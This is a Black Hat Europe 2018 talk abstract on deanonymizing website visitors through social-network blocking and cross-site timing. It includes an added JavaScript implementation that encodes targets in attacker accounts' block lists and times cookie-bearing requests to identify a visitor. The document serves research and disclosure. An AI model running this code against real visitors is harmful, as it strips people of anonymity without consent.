I Block You Because I Love You: Social Account Identification Attack Against a Website Visitor

Presented at Black Hat Europe 2018, Dec. 6, 2018, 11:15 a.m. (50 minutes).

In this talk, we present a practical side-channel attack that identifies the social web service account of a visitor to an attacker's website. Because user pages and profiles on social web services generally carry the user's real name and activities, identifying the social account readily strips a website visitor of anonymity.

Our attack leverages the widely adopted user-blocking mechanism, abusing its inherent property that certain pages return different content depending on whether the viewer is blocked by the page owner. Our key insight is that an account prepared by an attacker holds an attacker-controllable binary state of blocking/non-blocking with respect to an arbitrary user on the same service. When that user visits the attacker's website, this state can be retrieved as one bit of data through a conventional cross-site timing attack: the browser attaches the visitor's session cookies to the cross-site request, so the response the attacker's page times is the one the visitor's own account would see. We generalize this property as "visibility control," which we consider to be the fundamental assumption of our attack. Building on this primitive, an attacker with a set of controlled accounts gains flexible control over the data leaked through the side channel, since each account contributes one independent bit. Using this mechanism, it is possible to design a robust, large-scale user identification attack on social web services.
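The following is an added illustration of the visibility-control primitive just described; it is not code from the talk or its authors. It assumes an attacker who has enumerated a candidate list of target accounts, k attacker-controlled accounts, a per-account profile URL (the `url` parameter, assumed), and a service on which the blocked variant of the page loads faster than the full profile (the `fastMeansBlocked` flag, assumed). Account i blocks exactly those targets whose 1-based index has bit i set, so the pattern of "blocked / not blocked" bits observed at the visitor's browser decodes to one target. The all-zero pattern is reserved for a visitor who is not in the target list at all (or is not logged in), which is why N targets need k accounts with 2^k - 1 >= N rather than 2^k >= N.

```javascript
// Added example: encoding a visitor's identity in k attacker accounts' block
// states and decoding it from cross-site timing measurements. Service, URLs
// and timing thresholds are assumptions, not details from the talk.

// Decide which targets each of the k attacker accounts must block so that every
// target maps to a distinct non-zero k-bit codeword (bit i = blocked by account i).
// Returns an array of k Sets; plan[i] is the block list of attacker account i.
function buildBlockPlan(targets, k) {
  if (targets.length > 2 ** k - 1) {
    throw new Error(`${k} accounts distinguish at most ${2 ** k - 1} targets`);
  }
  const plan = Array.from({ length: k }, () => new Set());
  targets.forEach((user, position) => {
    const index = position + 1; // index 0 is reserved for "not a target"
    for (let bit = 0; bit < k; bit++) {
      if ((index >> bit) & 1) plan[bit].add(user);
    }
  });
  return plan;
}

// Smallest number of attacker accounts that can encode n targets.
function accountsNeeded(n) {
  let k = 1;
  while (2 ** k - 1 < n) k++;
  return k;
}

// Reverse the encoding: bits[i] is 1 if attacker account i blocks the visitor.
// Returns the identified target, or null for an unknown visitor.
function decodeVisitor(targets, bits) {
  let index = 0;
  bits.forEach((b, i) => { if (b) index |= 1 << i; });
  return index === 0 || index > targets.length ? null : targets[index - 1];
}

// Median of a list of timings; robust to the occasional slow sample.
function median(values) {
  const s = [...values].sort((a, b) => a - b);
  const m = Math.floor(s.length / 2);
  return s.length % 2 ? s[m] : (s[m - 1] + s[m]) / 2;
}

// Turn load-time samples for one attacker account into one bit. Which side of
// the threshold means "blocked" depends on the service (assumed here: the
// blocked visitor gets a short "unavailable" page, hence a faster load).
function classifyTimings(samplesMs, thresholdMs, fastMeansBlocked = true) {
  const fast = median(samplesMs) < thresholdMs;
  return fast === fastMeansBlocked ? 1 : 0;
}

// Browser-side probe (runs only in a browser): load the attacker account's page
// as the visitor. The browser sends the visitor's cookies with the request, so
// the load time reflects the variant the visitor's own account would receive.
// Nothing but timing leaks; the response content stays opaque to this page.
function probeLoadTime(url) {
  return new Promise((resolve) => {
    const img = new Image();
    const start = performance.now();
    img.onload = img.onerror = () => resolve(performance.now() - start);
    img.src = url;
  });
}

// Measure one bit for one attacker account with repeated samples.
async function measureBit(url, samples, thresholdMs) {
  const times = [];
  for (let i = 0; i < samples; i++) times.push(await probeLoadTime(url));
  return classifyTimings(times, thresholdMs);
}

// Dry run without a browser: derive the bits straight from the block plan for a
// constructed visitor and decode them, as the timing probes would.
function simulateIdentification(targets, visitor) {
  const plan = buildBlockPlan(targets, accountsNeeded(targets.length));
  const bits = plan.map((blocked) => (blocked.has(visitor) ? 1 : 0));
  return decodeVisitor(targets, bits);
}
```

In a live run the attacker page calls `measureBit` once per attacker account and feeds the resulting bit vector to `decodeVisitor`; `simulateIdentification` only short-circuits the timing step. The threshold and sample count must be calibrated per service, and a visitor whose browser does not attach cookies to the cross-site request (for example because of a SameSite cookie policy) produces the all-zero pattern and decodes to null rather than to a wrong target.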

We performed an extensive empirical study and found that at least 12 services are vulnerable: Facebook, Instagram, Tumblr, Google+, Twitter, eBay, PornHub, Medium, Xbox Live, Ashley Madison, Roblox, and Xvideos. The attack achieves 100% accuracy and completes quickly enough to be practical in a realistic setting.

We have shared details of this attack and countermeasures with service providers and browser vendors. As a result, Twitter and eBay have changed their implementations to prevent the attack. In addition, support for the cookie "SameSite attribute," which stops the browser from attaching the visitor's cookies to the cross-site requests the attack relies on, has been added to major browsers including Microsoft Edge, Internet Explorer, and Mozilla Firefox.


Presenters:

  • Takuya Watanabe - Security Researcher, NTT
    Takuya Watanabe received an M.E. degree in computer science and engineering from Waseda University, Japan, in 2016. Since joining Nippon Telegraph and Telephone Corporation (NTT) in 2016, he has been engaged in research and development on cyber security.
